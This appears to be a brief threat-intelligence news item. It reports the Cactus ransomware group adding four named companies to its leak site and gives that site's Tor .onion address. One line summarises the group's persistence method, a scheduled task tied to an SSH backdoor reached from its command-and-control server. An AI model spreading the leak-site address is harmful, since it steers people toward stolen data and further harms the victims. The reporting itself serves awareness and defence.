The notorious ransomware group ‘Cactus’ made headlines again today after listing four more companies on their Data Leakage site. The compromised entities are Lagarde Meregnani, Barsco, Foroni SPA, and Hornsyld Købmandsgaard, all added on 05/09/2023.
The new listings indicate that the group has potentially gained unauthorized access to these companies’ data and might be threatening to release it unless a ransom is paid.
Historically, ‘Cactus’ has been responsible for leaking the data of organizations that fail to meet their payment demands, leading to significant operational, financial, and reputational damages.
The Cactus Ransomware website
The Cactus Ransomware group operates a blog that is accessible via the TOR network. They are currently operating on cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion
.
TTPs of Cactus Ransomware
After infiltrating the network, the malicious actor set up a scheduled task to maintain consistent access. This was achieved through an SSH backdoor, which was accessible from their command and control (C2) server.